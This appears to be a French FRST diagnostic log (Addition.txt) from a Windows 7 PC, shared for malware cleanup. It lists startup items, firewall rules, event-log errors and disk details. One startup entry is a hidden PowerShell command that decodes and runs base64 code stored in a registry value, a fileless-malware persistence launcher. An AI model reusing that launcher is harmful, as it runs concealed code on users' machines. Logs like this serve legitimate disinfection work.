=============== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.) ==================== Internet Explorer sites de confiance/sensibles =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.) IE trusted site: HKU\S-1-5-21-1281696408-34496212-1937324486-1001\...\localhost -> localhost ==================== Hosts contenu: =============================== (Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.) 2009-07-14 03:04 - 2009-06-10 22:39 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts ==================== Autres zones ============================ (Actuellement, il n'y a pas de correction automatique pour cette section.) HKU\S-1-5-21-1281696408-34496212-1937324486-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\nours52\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 212.27.40.241 - 212.27.40.240 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Le Pare-feu est activé. ==================== MSCONFIG/TASK MANAGER éléments désactivés == MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^TP-LINK Wireless Configuration Utility.lnk => C:\Windows\pss\TP-LINK Wireless Configuration Utility.lnk.CommonStartup MSCONFIG\startupfolder: C:^Users^nours52^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Logitech . Enregistrement du produit.lnk => C:\Windows\pss\Logitech . Enregistrement du produit.lnk.Startup MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner.exe" /MONITOR MSCONFIG\startupreg: DriveUtilitiesHelper => C:\Program Files\Western Digital\WD Utilities\WDDriveUtilitiesHelper.exe MSCONFIG\startupreg: EPLTarget => MSCONFIG\startupreg: FUFAXRCV => "C:\Program Files\Epson Software\FAX Utility\FUFAXRCV.exe" MSCONFIG\startupreg: FUFAXSTM => "C:\Program Files\Epson Software\FAX Utility\FUFAXSTM.exe" MSCONFIG\startupreg: IncrediMail => C:\Program Files\IncrediMail\bin\IncMail.exe /c MSCONFIG\startupreg: KiesTrayAgent => C:\Program Files\Samsung\Kies\KiesTrayAgent.exe MSCONFIG\startupreg: LWS => C:\Program Files\Logitech\LWS\Webcam Software\LWS.exe -hide MSCONFIG\startupreg: MSC => "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey MSCONFIG\startupreg: NVRaidService => C:\Program Files\NVIDIA Corporation\Raid\nvraidservice.exe MSCONFIG\startupreg: PlaysTV => "C:\Program Files\Raptr Inc\PlaysTV\playstv_launcher.exe" --startup MSCONFIG\startupreg: Secret Disk Maintance => "C:\Program Files\Secret Disk\net1.exe" windowsStartup MSCONFIG\startupreg: StartCCC => "C:\Program Files\AMD\ATI.ACE\Core-Static\x86\CLIStart.exe" MSRun MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files\Common Files\Java\Java Update\jusched.exe" MSCONFIG\startupreg: SUPERAntiSpyware => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe MSCONFIG\startupreg: ultracopier => "C:\Program Files\Ultracopier\ultracopier.exe" MSCONFIG\startupreg: VoipConnect => "C:\Program Files\VoipConnect.com\VoipConnect\voipconnect.exe" -nosplash -minimized MSCONFIG\startupreg: WD Drive Unlocker => C:\Program Files\Western Digital\WD Security\WDDriveAutoUnlock.exe MSCONFIG\startupreg: WD Quick View => C:\Program Files\Western Digital\WD Quick View\WDDMStatus.exe MSCONFIG\startupreg: {14007244-BAA4-412A-AEB5-F906F18A86F1} => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\DEmXzpW').DYCglfzGaUUsg))); ==================== RèglesPare-feu (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) FirewallRules: [{EF445572-A509-4044-9372-CDC60EB10CC7}] => (Allow) C:\Users\nours52\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe FirewallRules: [{CDF85DAC-A5DB-4A40-816D-C3F46430FAED}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe FirewallRules: [{3CE0FBC4-C1FA-44A4-984E-024C181DDA6C}] => (Allow) C:\Program Files\Windows Live\Contacts\wlcomm.exe FirewallRules: [{478D4E23-D380-44EF-BBBB-4645446DD81D}] => (Allow) LPort=2869 FirewallRules: [{6951F115-9BF1-46C5-A2FF-1ECFB4F60596}] => (Allow) LPort=1900 FirewallRules: [{DD34F1F7-964E-492D-A378-CDE81BADB60F}] => (Allow) C:\Program Files\Windows Live\Messenger\msnmsgr.exe FirewallRules: [{A3ADF52F-B7A6-4151-9156-214AA4D1C61C}] => (Allow) C:\Program Files\VoipConnect.com\VoipConnect\VoipConnect.exe FirewallRules: [{25E766DE-A324-41E5-B51B-C2EBD8B6F3DA}] => (Allow) C:\Program Files\VoipConnect.com\VoipConnect\VoipConnect.exe FirewallRules: [{361BEDF5-51F3-4E43-BFD0-9922358F38F4}] => (Allow) C:\Program Files\VoipConnect.com\VoipConnect\VoipConnect.exe FirewallRules: [{085BE1B2-9741-4BB6-8E6A-3ACAE8D97997}] => (Allow) C:\Program Files\VoipConnect.com\VoipConnect\VoipConnect.exe FirewallRules: [{DECEE567-D720-43F3-B238-6C8DC950DB79}] => (Allow) LPort=48113 FirewallRules: [{D6928800-5772-413E-8EAD-0987A4B82569}] => (Allow) LPort=48114 FirewallRules: [{1FD6A28E-3E8C-4CFE-A08C-5452016818F8}] => (Allow) C:\Users\nours52\AppData\Local\Chromium\Application\chrome.exe FirewallRules: [{5E27F83C-9F86-4CC6-B815-D67E3CADCED4}] => (Allow) C:\Program Files\IncrediMail\Bin\ImpCnt.exe FirewallRules: [{5B27EBA0-EEB1-4F17-AC5E-5483DC6925F3}] => (Allow) C:\Program Files\IncrediMail\Bin\ImpCnt.exe FirewallRules: [{151A4244-6F6D-4D43-BC00-19EFFBF41097}] => (Allow) C:\Program Files\TeamViewer\Version7\TeamViewer.exe FirewallRules: [{B86AFDEC-63CB-4B6F-B8E6-E0D78B0B248D}] => (Allow) C:\Program Files\TeamViewer\Version7\TeamViewer.exe FirewallRules: [{F1C9CA7E-8DCA-43F7-9CBA-D1FC9468B936}] => (Allow) C:\Program Files\TeamViewer\Version7\TeamViewer_Service.exe FirewallRules: [{B5B9C250-E33F-4BF9-9ECE-16FD4CF91B52}] => (Allow) C:\Program Files\TeamViewer\Version7\TeamViewer_Service.exe FirewallRules: [{E01A5D5B-67E5-4591-B014-A3DC7AEFC757}] => (Allow) C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe FirewallRules: [{DE7AA474-B694-458B-A8E6-1183EA880C46}] => (Allow) C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe FirewallRules: [{D1DFB6D2-3A95-4755-9A75-297A761C01E0}] => (Allow) C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe FirewallRules: [{EA09BE7D-CA61-4DFB-A013-6ABEFDFF0041}] => (Allow) C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe FirewallRules: [{0A518C50-EC6E-4EDF-8817-BCEA5C181677}] => (Allow) C:\Program Files\Skype\Phone\Skype.exe FirewallRules: [{37CAD74E-C6A8-4394-9CB8-EFC5681BAC66}] => (Allow) C:\Program Files\DriversCloud.com\MCDetection.exe FirewallRules: [{ABE4275A-F0FB-4196-9B21-C93F8D1FBCF1}] => (Allow) C:\Program Files\DriversCloud.com\MCDetection.exe FirewallRules: [{B26ED684-C657-4DC2-AFB2-CE6B4E1FE37E}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{4FE03F6A-91EF-4CE2-AB95-30619F3489F7}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{31011518-83CB-4BA0-8202-B9D8423D7DFA}] => (Allow) C:\Windows\System32\migwiz\migwiz.exe FirewallRules: [{D4AF2EC0-DA01-4EB6-B28B-C4913BC59719}] => (Allow) C:\Windows\System32\migwiz\migwiz.exe FirewallRules: [{46D86110-10BA-4CBA-BE69-95ACB616DA5F}] => (Allow) LPort=7000 FirewallRules: [{95E03C29-4F12-4CCB-AA11-170E61B47D6E}] => (Allow) LPort=7000 FirewallRules: [{971B6848-B59D-4701-A1ED-8B961EE36616}] => (Allow) C:\Program Files\Raptr Inc\Raptr\raptr_im.exe FirewallRules: [{70346BBE-6B31-4D54-8317-CA9A7EC4F744}] => (Allow) C:\Program Files\Raptr Inc\Raptr\raptr_im.exe FirewallRules: [{3EC228D9-F9D9-41AF-825D-8F9AEE135EA8}] => (Allow) C:\Program Files\Raptr Inc\PlaysTV\playstv.exe FirewallRules: [{6B268F10-DD0F-4133-82FE-F9209ABECA7D}] => (Allow) C:\Program Files\Raptr Inc\PlaysTV\playstv.exe FirewallRules: [{FE51DA3D-B73C-416C-A166-12256C9FBF56}] => (Allow) C:\Program Files\IncrediMail\Bin\ImApp.exe FirewallRules: [{CB0817D3-DF10-42E9-BC7A-CEA38CF3B9A8}] => (Allow) C:\Program Files\IncrediMail\Bin\ImApp.exe FirewallRules: [{FE3D399A-8899-46B5-9EB1-006B74511203}] => (Allow) C:\Program Files\IncrediMail\Bin\IncMail.exe FirewallRules: [{860E353F-05D2-429B-A0FB-C1F5FA475251}] => (Allow) C:\Program Files\IncrediMail\Bin\IncMail.exe FirewallRules: [{75C17E4C-9E01-4D3A-8596-636AB2FBE20D}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe FirewallRules: [{154E344E-7679-4D86-B8E7-347294CF3D96}] => (Allow) C:\Program Files\IncrediMail\Bin\IncMail.exe FirewallRules: [{693B8B67-151F-4FAB-8CCB-0AFDDB872663}] => (Allow) C:\Program Files\IncrediMail\Bin\IncMail.exe FirewallRules: [{398BB4C9-9DDF-4D4C-BFA4-5509C249CD7A}] => (Allow) C:\Program Files\IncrediMail\Bin\ImApp.exe FirewallRules: [{662E30BC-5AA7-4A1C-863B-248CBBA317F5}] => (Allow) C:\Program Files\IncrediMail\Bin\ImApp.exe FirewallRules: [{2E9DBBE4-CC5D-4197-A741-F362BD25B03D}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.561_0\SZBrowser.exe FirewallRules: [{989B4FF5-1E43-42E7-B022-B69A3FDDAFC5}] => (Allow) C:\Program Files\IObit\Driver Booster\4.2.0\DriverBooster.exe FirewallRules: [{95ECC557-3101-48F2-B67E-4E8391B80C8D}] => (Allow) C:\Program Files\IObit\Driver Booster\4.2.0\DriverBooster.exe FirewallRules: [{6C888815-4D7C-4731-9127-E2B801DFF6AB}] => (Allow) C:\Program Files\IObit\Driver Booster\4.2.0\DBDownloader.exe FirewallRules: [{4042F3DA-E580-4085-A50C-CCBD7CFDE857}] => (Allow) C:\Program Files\IObit\Driver Booster\4.2.0\DBDownloader.exe FirewallRules: [{E58C167F-C229-455F-8E37-3AA6B4C7774B}] => (Allow) C:\Program Files\IObit\Driver Booster\4.2.0\AutoUpdate.exe FirewallRules: [{D096D47C-6DA8-4131-832C-59A795F4CCF9}] => (Allow) C:\Program Files\IObit\Driver Booster\4.2.0\AutoUpdate.exe ==================== Points de restauration ========================= 24-02-2017 08:21:49 Sauvegarde Windows 28-02-2017 18:08:07 Windows Update 02-03-2017 07:50:40 Installed FastPictureViewer Professional 1.9.358.0 (32-bit) 03-03-2017 22:04:33 Windows Update ==================== Éléments en erreur du Gestionnaire de périphériques ============= Name: Description: Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. Name: Teredo Tunneling Pseudo-Interface Description: Microsoft Teredo Tunneling Adapter Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: Microsoft Service: tunnel Problem: : This device cannot start. (Code10) Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device. On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard. ==================== Erreurs du Journal des événements: ========================= Erreurs Application: ================== Error: (03/03/2017 10:38:12 PM) (Source: Windows Search Service) (EventID: 7010) (User: ) Description: Impossible d’initialiser l’index. Détails : Une erreur inattendue s’est produite. (HRESULT : 0x80041501) (0x8000ffff) Error: (03/03/2017 10:38:12 PM) (Source: Windows Search Service) (EventID: 3058) (User: ) Description: Impossible d’initialiser l’application. Contexte : Application Windows Détails : Une erreur inattendue s’est produite. (HRESULT : 0x80041501) (0x8000ffff) Error: (03/03/2017 10:38:12 PM) (Source: Windows Search Service) (EventID: 3028) (User: ) Description: Impossible d’initialiser l’objet rassembleur. Contexte : Application Windows, Catalogue SystemIndex Détails : Une erreur inattendue s’est produite. (HRESULT : 0x80041501) (0x8000ffff) Error: (03/03/2017 10:38:11 PM) (Source: Windows Search Service) (EventID: 9002) (User: ) Description: Le service Windows Search ne peut pas charger les informations de la banque de propriétés. Contexte : Application Windows, Catalogue SystemIndex Détails : La mise à jour ou l’accès aux informations par le serveur d’index de contenu a échoué du fait d’une erreur de base de données. Arrêtez et redémarrez le service de recherche. Si le problème persiste, réinitialisez et analysez de nouveau l’index de contenu. Il peut être nécessaire, dans certains cas, de supprimer puis de recréer l’index de contenu. (HRESULT : 0x8004117f) (0x8004117f) Error: (03/03/2017 10:38:11 PM) (Source: Windows Search Service) (EventID: 7040) (User: ) Description: Le service de recherche a détecté des fichiers de données endommagés dans l’index {id=1100}. Le service tentera de corriger automatiquement ce problème en recréant l’index. Détails : Le catalogue d’index des contenus est endommagé. (HRESULT : 0xc0041801) (0xc0041801) Error: (03/03/2017 10:38:11 PM) (Source: Windows Search Service) (EventID: 9000) (User: ) Description: Le service Windows Search ne peut pas ouvrir la banque de propriétés Jet. Détails : 0x%08x (0x8004117f - La mise à jour ou l’accès aux informations par le serveur d’index de contenu a échoué du fait d’une erreur de base de données. Arrêtez et redémarrez le service de recherche. Si le problème persiste, réinitialisez et analysez de nouveau l’index de contenu. Il peut être nécessaire, dans certains cas, de supprimer puis de recréer l’index de contenu. (HRESULT : 0x8004117f)) Error: (03/03/2017 10:38:06 PM) (Source: Windows Search Service) (EventID: 7010) (User: ) Description: Impossible d’initialiser l’index. Détails : Une erreur inattendue s’est produite. (HRESULT : 0x80041501) (0x8000ffff) Error: (03/03/2017 10:38:06 PM) (Source: Windows Search Service) (EventID: 3058) (User: ) Description: Impossible d’initialiser l’application. Contexte : Application Windows Détails : Une erreur inattendue s’est produite. (HRESULT : 0x80041501) (0x8000ffff) Error: (03/03/2017 10:38:06 PM) (Source: Windows Search Service) (EventID: 3028) (User: ) Description: Impossible d’initialiser l’objet rassembleur. Contexte : Application Windows, Catalogue SystemIndex Détails : Une erreur inattendue s’est produite. (HRESULT : 0x80041501) (0x8000ffff) Error: (03/03/2017 10:38:06 PM) (Source: Windows Search Service) (EventID: 9002) (User: ) Description: Le service Windows Search ne peut pas charger les informations de la banque de propriétés. Contexte : Application Windows, Catalogue SystemIndex Détails : La mise à jour ou l’accès aux informations par le serveur d’index de contenu a échoué du fait d’une erreur de base de données. Arrêtez et redémarrez le service de recherche. Si le problème persiste, réinitialisez et analysez de nouveau l’index de contenu. Il peut être nécessaire, dans certains cas, de supprimer puis de recréer l’index de contenu. (HRESULT : 0x8004117f) (0x8004117f) Erreurs système: ============= Error: (03/03/2017 10:38:12 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Le service Windows Search s’est terminé de façon inattendue pour la 18ème fois. Error: (03/03/2017 10:38:12 PM) (Source: Service Control Manager) (EventID: 7024) (User: ) Description: Le service Windows Search s’est arrêté avec l’erreur service particulière Défaillance irrémédiable . Error: (03/03/2017 10:38:06 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Le service Windows Search s’est terminé de façon inattendue pour la 17ème fois. Error: (03/03/2017 10:38:06 PM) (Source: Service Control Manager) (EventID: 7024) (User: ) Description: Le service Windows Search s’est arrêté avec l’erreur service particulière Défaillance irrémédiable . Error: (03/03/2017 10:36:13 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Le service Windows Search s’est terminé de façon inattendue pour la 16ème fois. Error: (03/03/2017 10:36:13 PM) (Source: Service Control Manager) (EventID: 7024) (User: ) Description: Le service Windows Search s’est arrêté avec l’erreur service particulière Défaillance irrémédiable . Error: (03/03/2017 10:20:38 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Le service Windows Search s’est terminé de façon inattendue pour la 15ème fois. Error: (03/03/2017 10:20:38 PM) (Source: Service Control Manager) (EventID: 7024) (User: ) Description: Le service Windows Search s’est arrêté avec l’erreur service particulière Défaillance irrémédiable . Error: (03/03/2017 10:11:11 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Le service Windows Search s’est terminé de façon inattendue pour la 14ème fois. Error: (03/03/2017 10:11:11 PM) (Source: Service Control Manager) (EventID: 7024) (User: ) Description: Le service Windows Search s’est arrêté avec l’erreur service particulière Défaillance irrémédiable . CodeIntegrity: =================================== Date: 2017-02-14 07:11:42.175 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\ProgramData\Trusteer\Rapport\store\exts\RapportMS\baseline\RapportIaso.sys car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2017-02-14 07:04:45.758 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Windows\System32\drivers\atikmdag.sys car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2017-02-14 07:04:45.680 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Windows\System32\drivers\atikmpag.sys car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2017-02-14 07:04:39.174 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Trusteer\Rapport\bin\RapportEI.sys car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2017-02-14 07:04:38.847 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Windows\System32\drivers\aswKbd.sys car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2017-02-14 07:04:38.644 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\ProgramData\Trusteer\Rapport\store\exts\RapportCerberus\baseline\RapportCerberus32_1609042.sys car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2017-02-14 07:04:30.750 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Windows\System32\drivers\aswSnx.sys car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2017-02-14 07:00:45.095 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Windows\System32\drivers\atikmdag.sys car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2017-02-14 07:00:45.017 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Windows\System32\drivers\atikmpag.sys car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2017-02-14 07:00:44.814 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Trusteer\Rapport\bin\RapportEI.sys car le jeu de hachages d’images par page n’a pas été trouvé sur le système. ==================== Infos Mémoire =========================== Processeur: Intel(R) Core(TM)2 Quad CPU Q6600 @ 2.40GHz Pourcentage de mémoire utilisée: 74% Mémoire physique - RAM - totale: 2047.23 MB Mémoire physique - RAM - disponible: 517.39 MB Mémoire virtuelle totale: 4394.46 MB Mémoire virtuelle disponible: 2225.31 MB ==================== Lecteurs ================================ Drive c: () (Fixed) (Total:1374.05 GB) (Free:1241.86 GB) NTFS Drive e: (ANCIEN DD: D) (Fixed) (Total:144.04 GB) (Free:130.12 GB) NTFS Drive j: (ANCIEN DD : C) (Fixed) (Total:144.29 GB) (Free:53.81 GB) NTFS ==>[système avec composants d'amorçage (obtenu depuis lecteur)] Drive l: (Disque local SAUVEGARDE) (Fixed) (Total:488.87 GB) (Free:354.76 GB) NTFS ==================== MBR & Table des partitions ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 4722BA51) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=1374 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=488.9 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: E7DD6C65) Partition 1: (Not Active) - (Size=9.8 GB) - (Type=27) Partition 2: (Active) - (Size=144.3 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=144 GB) - (Type=07 NTFS) ==================== Fin de Addition.txt ============================